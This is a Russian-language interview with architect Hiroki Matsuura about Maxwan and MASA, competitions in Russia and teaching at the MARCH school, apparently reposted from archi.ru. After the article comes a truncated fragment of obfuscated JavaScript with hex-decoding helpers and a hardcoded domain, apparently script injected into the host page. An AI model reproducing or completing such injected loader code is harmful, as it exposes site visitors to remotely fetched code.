Хироки Мацура, партнер бюро Maxwan и приглашенный профессор Школы МАРШ – об объективности градостроительства и субъективности архитектуры, потребителе как главном судье любого проекта и разнице между российскими и голландскими студентами-архитекторами.

Хироки Мацура

Хироки Мацура открыть большое изображение


Хироки Мацура (Hiroki Matsuura) – партнер и главный проектировщик бюро Maxwan (с 2004) и основатель мастерской MASA architects (2015). Родился и получил образование в Японии, живет и работает в Роттердаме. Приглашенный профессор Школы МАРШ (2016). В начале февраля 2016 принял участие как преподаватель в международном воркшопе «Пространство образования будущего» в Махачкале.

Архи.ру:
– Вы главный проектировщик и партнер бюро Maxwan Architects + Urbanists, которое уже зарекомендовало себя на мировом рынке. В какой момент и почему вы создали MASA architects? В чем принципиальная разница между этими бюро? Какова их целевая установка? Расскажите об особенностях их работы.

Хироки Мацура:
– Архитектурное бюро Maxwan было основано в 1993 Ринтсом Дейкстра и Рианне Маккинк. Изначально оно специализировалась на дизайне городской среды. Первым его крупным проектом стал генплан одного из крупнейших жилых районов Нидерландов площадью около 2500 га (1994). В 2001 Рианне покинула Maxwan, и Ринтс возглавлял его в одиночку до тех пор, пока я не стал его партнером в 2004. Я начал работать в Maxwan в 1997 на самой младшей должности из возможных, что, впрочем, неудивительно, так как тогда мне было всего 23 года. В это время Maxwan уже хорошо зарекомендовал себя как в профессиональной среде, так и среди клиентов. Наряду с основной специализацией, мы начали заниматься и градостроительством. Как ни странно, все сотрудники компании, включая и меня, были архитекторами, но специфика заказов заставляла нас активно трудиться на градостроительном поприще.

А потом, как вам известно, произошла череда событий, негативно повлиявшая на конъюнктуру рынка: за архитектурным бумом 1990-х последовал финансовый кризис 2008 года, и как следствие – дефицит заказов. Архитектурных бюро на тот момент было великое множество, но лишь немногим удалось остаться на плаву. С какого-то момента Maxwan перестали воспринимать как архитектурное бюро, в глазах большинства мы были просто градостроителями. Несмотря на то, что в начале 2000-х нам удалось успешно реализовать целый ряд архитектурных проектов, наши перспективы в области архитектуры выглядели довольно туманными. Так возник целый ряд причин, которые и привели в итоге к появлению MASA.

Большинством архитектурных проектов в Maxwan занимались я и мой коллега Рене Сангерс, по иронии судьбы он пришел в бюро всего на две недели позже меня. Именно Рене и стал моим партнером в MASA. Название нашего бюро составлено из первых двух букв наших фамилий. MASA – симбиоз двух типов ментальности: японской и голландской. Появление второго бюро наряду с уже существующим положительно сказалось на формирование идентичности каждого из них, так как создание многофункциональной фирмы изначально не входило в наши планы. Юридически это два разных бюро, но особой разницы в их структуре, корпоративных принципах, методах работы и политике нет; более того, мы «обитаем» в одном месте и нередко работаем над совместными проектами. Синергия – это наше перманентное состояние, MASA и Maxwan – равноправные участники творческого процесса.

– Широта ваших профессиональных занятий поражает: вы архитектор, градостроитель, дизайнер, бизнесмен, судили конкурсы, преподавали – кто же вы? В чем, на ваш взгляд, заключается роль современного архитектора?

– Если честно, я никогда не думал об этом, но я могу сказать, что я рожден для того, чтобы создавать: мне нравится ставить себе задачи и решать их. Наша радость от занятия нашей профессией связана с пониманием того, что наша работа может иметь самые разные последствия. Однако надо осознавать, что это влияние может быть как положительным, так и негативным. К сожалению, проявления непрофессионализма и их отрицательные последствия встречаются довольно часто не только в сфере промышленного и графического дизайна, но и в архитектуре и градостроительстве. В этом случае не всегда стоит полагаться только на собственное мнение, существует целый ряд критериев: любой объект проходит проверку временем, если он хороший – его копируют, если плохой – забывают. Главный судья – это потребитель конечного продукта, именно он оценивает нашу работу. Что касается меня, я бы хотел творить вне времени. В самом сердце Роттердама, в гавани стоит множество безымянных построек: глядя на них, создается полное ощущение, что они были здесь всегда. Мне неважно, будут помнить меня или нет, но мне бы очень хотелось, чтобы мои объекты создавали подобное впечатление. Формируя новое, важно сохранять неуловимое содержание, которое дают дух места и материалы, выбранные при проектировании.

Что касается вопроса о мультидисциплинарности, в моем конкретном случае все вышло абсолютно случайно, я ничего не планировал, а просто делал то, что считал нужным. Мой опыт урбаниста и проектировщика городской среды оказался весьма полезным в моей архитектурной практике, но, если честно, я уверен, что город и здание неотделимы друг от друга. Именно поэтому я не стал бы говорить в этом контексте о мультидисциплинарности, да и рассматривать эту тенденцию применительно к современным архитекторам я тоже не считаю правильным. Начну издалека: я очень завидую поколению архитекторов, которым посчастливилось сыграть чрезвычайно важную и четко определенную роль в обществе. На их век выпало решение многих практических задач: проблема перенаселенности городов, ликвидация последствий Второй мировой войны. Они прикладывали нечеловеческие усилия для разрешения ключевых социальных проблем, применяя наиболее передовые технологии своего времени, разрабатывая и внедряя новую типологию. При этом они не забывали думать о будущем, пытались внести в него свой вклад.

В настоящее время 90% всех заказов – это чистой воды коммерция: вы должны сделать качественный проект, отвечающий всем потребностям клиента. В то же время, в моей практике был такой случай, когда один очень крупный девелопер обратился к нам с просьбой построить огромный торговый центр в жилом квартале. Нам пришлось долго и мучительно объяснять ему, что с профессиональной точки зрения такая постройка не только не целесообразна, но и попросту вредна. С одной стороны, мы вынуждены делать то, о чем нас просит заказчик, ведь мы исполнители, наемная рабочая сила, и не вправе отказываться от работы по субъективным причинам, с другой стороны, нам следует руководствоваться здравым смыслом и не поддаваться на провокации. В случае возникновения подобного рода дилеммы, архитектору довольно сложно противостоять сложившейся системе и, следовательно, вероятность создания чего-то выдающегося сводится к минимуму. Но, тем не менее, чудеса случаются, и я не теряю надежды на то, что архитекторам еще удастся сыграть важную роль в развитии общества.

– Я с удивлением обнаружила в ваших проектах большое разнообразие формальных подходов. Какова философия вашей архитектуры?

– Одна из отличительных черт нашей работы заключается в том, что мы используем практически один и тот же подход при реализации архитектурных, градостроительных, ландшафтных и дизайнерских проектов. Конечно же, их масштаб, а также используемые нами приемы отличаются, но метод во многом схож. Выбор «языка» объекта – это прямое следствие предлагаемых условий: контекста, его типологических особенностей и т.д. Принципиальная разница между проектом частного дома и градостроительным проектом заключается лишь в том, что, создавая среду проживания для 300 000 человек, вы имеете дело с множеством неизвестных вам факторов, потому что вы никогда не узнаете, кто станет конечным пользователем вашего продукта. Поэтому вы должны сосредоточиться на создании качественной, безопасной среды, удовлетворяющей потребностям различных социальных групп, будь то мамы с детьми, пожилые пары или любители собак. Качественно спроектированные места общего пользования приятны и полезны для всех, и нет ничего страшного в том, что они будут типовыми, в хорошем смысле «никакими». Но принципы и подходы, используемые в дизайне городской среды, неприменимы к знаковым, уникальным объектам архитектуры, так как копирование подобного рода построек их обесценивает.

Обилие формальных приемов можно расценивать как с положительной, так и отрицательной точки зрения. Соглашусь, что иногда этот фактор играет против нас, ведь с точки зрения маркетинга клиенты обращаются в архитектурное бюро, за которым закрепилась определенная идентичность, тождественная представлениям и взглядам заказчика. Грубо говоря, если вы обращаетесь в SANAA, у вас есть определенные ожидания, потому что в каждой их работе прослеживается единый стиль. Я согласен, что это одна из возможных стратегий успеха, тем не менее, мы придерживаемся другого подхода. Каждый случай для нас – частный; с одной стороны, мы следим за новыми тенденциям, но, в то же самое время, у нас есть сложившиеся приемы и методы. Другое дело, что, вероятно, их не всегда можно считать. Мы всегда разные, и нам никогда не надоест то, что мы делаем.

– Как я понимаю, на российский рынок вас привело участие в конкурсах: парк «Зарядье», МФЦ, «Москва-река», «Сколково», ЗИЛ. В чем заключается ваш личный интерес к России? Есть ли он? Существует ли своего рода особенности, специфика работы в нашей стране? Не могли бы вы сказать несколько слов о вашем опыте сотрудничества с местными бюро?

– У этого решения было множество причин, в том числе и те, о которых я упомянул выше. Не следует забывать и о строительном буме в России. Надо сказать, что это было время перемен и для Maxwan, мы, наконец, осознали, что нам необходимо выйти на международный рынок. В конце 2000-го нам представился такой шанс: одна инвестиционно-строительная компания из Москвы пригласила нас принять участие в конкурсе на разработку Квартала А101. Можно сказать, что это событие стало для нас переломным, так как с этого момента мы начали получать приглашения от российских девелоперов к участию в конкурсах и тендерах. Выходя на рынок РФ, мы были чрезвычайно наивными, полагая, что здесь нас ждут с распростертыми объятиями. Нам казалось, что в таком динамичном мегаполисе, как Москва, мы сможем легко занять свою нишу и воплотить в жизнь наши идеи. Мы были уверены, что, если выполненный нами проект качественен, успешен, коммерчески выгоден, то клиенты оценят его и захотят и в дальнейшем использовать наши наработки и идеи. Но все оказалось не так просто. Трудность работы в России заключается в том, что здесь многое зависит не от желания граждан, а от отдельных чиновников; мне это видится своего рода системной ошибкой или пережитком старорежимной бюрократии. Частные компании начали появляться в России только после перестройки, поэтому новая система отношений находится в стадии формирования. Я встретил в Москве множество специалистов мирового уровня, но, тем не менее, потенциал роста здесь еще очень велик, и для меня как для профессионала это представляет большой интерес. Ну и конечно, не стоит забывать, что я японец, более 20 лет живущий в Голландии, что само по себе – экзотика, но и возможность поработать в России, где все иначе, тоже представляется мне уникальной.

Парк «Зарядье». Проект консорциума ТПО «Резерв» + Maxwan + Latz und Partner

Парк «Зарядье». Проект консорциума ТПО «Резерв» + Maxwan + Latz und Partner открыть большое изображение

Для реализации наших планов было необходимо сделать что-то особенное, что бы вывело нас на более высокий профессиональный уровень и я решил принять участие в конкурсе на разработку концепции парка «Зарядье». Теоретически мы могли бы справиться со стоявшими перед нами задачами собственными силами, но, с другой стороны, мы понимали, что для победы нам нужны сильные союзники. Именно поэтому я связался с Latz+Partner landscape architects и ТПО «Резерв», предложил план совместных действий, и обе фирмы ответили согласием. К сожалению, нам не удалось выиграть, но я должен сказать, что сотрудничество с ТПО «Резерв» было просто чудесным. Я очень благодарен Антону Егереву, одному из ведущих архитекторов «Резерва» – именно он выступал в роли «связного» и одновременно был руководителем проекта. Мне кажется, без него наше сотрудничество было бы невозможно. Мы встретились с Антоном в 2008 в Голландии и уже тогда мечтали сделать что-то вместе. Он мне как брат, у нас схожие взгляды и вкусы, я бы даже сказал, что он немного голландец. Кроме того, в процессе конкурсной работы у меня сложились прекрасные отношения с Владимиром Плоткиным, возможно, в этом есть что-то личное: его спокойствие и уверенность мне очень близки. Мы никогда не говорили на повышенных тонах, наше сотрудничество было построено на принципах взаимного уважения. Я бы с радостью повторил этот опыт сотрудничества в будущем, потому что всегда хотел бы работать только с теми, кому я действительно могу доверять.

Концепция МФЦ в Рублево-Архангельском. ТПО «Резерв» – Maxwan. Иллюстрация предоставлена ЗАО «Рублево-Архангельское».

Концепция МФЦ в Рублево-Архангельском. ТПО «Резерв» – Maxwan. Иллюстрация предоставлена ЗАО «Рублево-Архангельское». открыть большое изображение

Крытый бульвар над старицей Москвы-реки. Концепция МФЦ в Рублево-Архангельском. Skidmore, Owings & Merrill Llp and Andrey Chernikhov Architecture and Design Studio Ltd. Иллюстрация: стоп-кадр из ролика. Предоставлена ЗАО «Рублево-Архангельское».

Крытый бульвар над старицей Москвы-реки. Концепция МФЦ в Рублево-Архангельском. Skidmore, Owings & Merrill Llp and Andrey Chernikhov Architecture and Design Studio Ltd. Иллюстрация: стоп-кадр из ролика. Предоставлена ЗАО «Рублево-Архангельское». открыть большое изображение

Следующим важным этапом нашей деятельности в России стало участие в архитектурных конкурсах на проекты Международного финансового центра и развития Москвы-реки. Эти три проекта сделали нас «своими», мы получили признание, что открыло перед нами новые возможности. Сейчас мы работаем над ландшафтным дизайном для Иннограда «Сколково»: это наш первый масштабный проект в России и знаковая победа, своего рода вознаграждение за семь лет неудач. Я убежден, что у нас не было бы этого шанса, если бы мы не участвовали во всех более ранних конкурсах, которые стали для нас «трамплином». Мы дважды оказывались вторыми и были очень разочарованы, но здесь, как на Олимпийских играх, можно расстраиваться, что проиграл, а можно радоваться: ведь ты был в шаге от победы, что само по себе немало.

Концепция развития территорий у Москвы-реки © Maxwan + Atrium

Концепция развития территорий у Москвы-реки © Maxwan + Atrium открыть большое изображение

Концепция развития территорий у Москвы-реки © Maxwan + Atrium

Концепция развития территорий у Москвы-реки © Maxwan + Atrium открыть большое изображение


– Я знаю, что вы преподавали в Институте Берлаге, читали лекции в Делфтском техническом университете и Академии архитектуры в Роттердаме. Какое место в вашей практике занимает образовательная деятельность?

– Если честно, я никогда не думал о карьере преподавателя. Возможно, все дело в том, что у меня было очень мало времени, так как уже несколько лет Ринтс Дейкстра, партнер и основатель Maxwan, занимает должность государственного советника по городскому планированию и инфраструктуре Нидерландов (в Голландии обязанности главного архитектора разделены между тремя специалистами, отвечающими, соответственно, за архитектуру, ландшафтный дизайн, городское планирование и инфраструктуру). Кроме того, он преподает в Делфтском техническом университете. Как вы можете себе представить, совмещать образовательную деятельность с архитектурной практикой довольно сложно, и пример Ринтса всегда был у меня перед глазами. Тем не менее, я хотел бы в будущем попробовать себя в роли преподавателя, тем более что у меня уже есть опыт работы в качестве приглашенного профессора. Я думаю, что мне есть, что сказать студентам, так как у меня за плечами многолетняя практика.

Я прагматик, материалист, и часто сталкивался с тем, что архитекторы склонны говорить о вещах, которые имеют большое значение для них, но не имеют ничего общего с реальной жизнью, забывая, что при работе над градостроительными проектами нельзя полагаться лишь на собственное видение жизни. Как я уже говорил, дизайн городской среды, в отличии от архитектуры, обусловлен лишь объективными причинами. На мой взгляд, научиться формулировать свое субъективное видение куда сложнее, чем руководствоваться сухим расчетом и здравым смыслом. Архитектурные идеи порой с трудом поддаются последовательному описанию, каждый отдельный случай уникален, вот почему научить методологии градостроительства, вероятно, гораздо легче, чем архитектуре.

– Как развивалось ваше сотрудничество со Школой МАРШ? Какие факторы повлияли на то, что вы согласились принять участие в качестве приглашенного критика на межсеместровой защите дипломной студии, а впоследствии выступили как один из преподавателей воркшопа «Пространство образования будущего» в Махачкале?

– На самом деле, все банально: двое из моих старинных приятелей – Антон Егерев и Надежда Нилина – работали в МАРШе, однако в тот период мне так и не довелось побывать здесь.
Я встретился с ректором МАРШа Евгением Ассом в Делфтском техническом университете: он с Владимиром Плоткиным читали там лекции. А вот директору Школы МАРШ Никите Токареву меня представила Надежда во время моего очередного визита в Москву (в тот момент мы с ней сотрудничали в рамках конкурса на концепцию развития Москвы-реки). В общем, теория шести рукопожатий в действии (смеется). Позднее меня пригласили в МАРШ прочесть лекцию, а после нее мне предложили стать там приглашенным профессором, и я просто не мог отказаться. А вот у участия в махачкалинском воркшопе было много причин: первая – любопытство, интерес к России, вторая – сами участники воркшопа, так как я лично проводил отбор, изучал их портфолио – надо сказать, удалось сформировать прекрасную интернациональная команду – а третья причина заключалась в том, что к этому времени я уже согласился на должность приглашенного профессора в МАРШе и мне хотелось сделать что-то для этого вуза.

– Учитывая свой преподавательский опыт, как вы оцениваете работу МАРШ и ее студентов, можно ли говорить о международном уровне образования в этом вузе? Воспринимаете ли вы МАРШ как российскую школу или международную?

– Уже десять лет Maxwan Architects + Urbanists по праву называется международным архитектурным бюро, т.к. порядка 70% наших сотрудников, в том числе и я сам, иностранцы. Я знаком со многими архитекторами с самым разным образованием, и, пожалуй, я могу оценивать и сравнивать его качество, но одно я могу сказать наверняка: благодаря Интернету и специализированным печатным изданиям архитектурное образование в разных вузах стало более единообразным. Эта касается не только студентов, но и преподавателей. Глядя на портфолио соискателя, в большинстве случаев невозможно определить, в какой стране учился его автор. Однако недавний межсеместровый, промежуточный просмотр дипломников МАРШ [защита дипломных проектов в МАРШ пройдет в конце мая 2016прим. Архи.ру], где я был приглашенным «критиком», заставила меня усомниться в своих прежних выводах. Презентация работ произвела на меня большое впечатление, в первую очередь, тем, что она разительно отличалась от того, что я привык видеть в Нидерландах. В Голландии студент умело представляет свой проект, используя все возможные приемы для того, чтобы заставить присутствующих поверить в его обоснованность и реалистичность, одновременно стесняясь продемонстрировать свое творческое начало, жертвуя «дерзостью», «сексуальностью» и «поэтичностью» идеи. Студент МАРШ – полная ему противоположность. Увиденные мною работы были чрезвычайно креативны, будоражили воображение, были подкреплены эмоциональными выступлениями, но большинству участников просмотра не хватало аргументов, для того, чтобы объяснить свой «творческий жест». Но суть проектов, их внутренняя мотивация были мне понятны на интуитивном уровне. Сделанное мною открытие заставило меня оптимистичнее взглянуть не только на методику преподавания в МАРШ в целом, но и на мое участие в педагогическом процессе. Потому что научиться «быть понятым» – это вопрос времени, и этому можно действительно научить, в то время как «необъяснимое» уже живет в этих ребятах. Я вижу огромный потенциал в российских студентах в связи с их высоким уровнем художественного мышления, что уже само по себе выводит МАРШ на международный уровень.

беседовала: Юлия Андрейченко
Источник: www.archi.ru

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

 
<< Первая < Предыдущая 21 22 23 24 25 26 27 28 29 30 Следующая > Последняя >>

Страница 30 из 92